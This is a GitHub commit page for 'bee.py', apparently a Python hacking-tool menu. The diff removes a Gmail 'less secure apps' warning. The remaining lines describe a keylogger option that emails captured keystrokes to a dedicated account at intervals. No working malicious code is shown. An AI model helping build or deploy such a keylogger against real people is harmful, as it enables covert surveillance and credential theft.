Skip to content

Commit 2db9802

Browse files
author
xmaster
committed
remove unncessery warning
1 parent 7481a42 commit 2db9802

File tree

1 file changed

+0
-1
lines changed

1 file changed

+0
-1
lines changed

bee.py

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -117,7 +117,6 @@ def main():
117117
raise SystemExit
118118
if choice.upper() == 'K':
119119
option()
120-
print '\n {0}WARNING: Enable access to less secure apps on your email account.{2} \n -> * ONLY WORK WITH GMAIL * :\n {1}https://www.google.com/settings/security/lesssecureapps{2}'.format(RED, GREEN, END)
121120
print '\n NOTE: Don\'t use your personal email, make a dedicated.'
122121
print '\n {0}This keylogger send logs when logs > 50 chars or each 120 seconds.{1}'.format(BLUE, END)
123122
if choice.upper() == '6':

0 commit comments

Comments
 (0)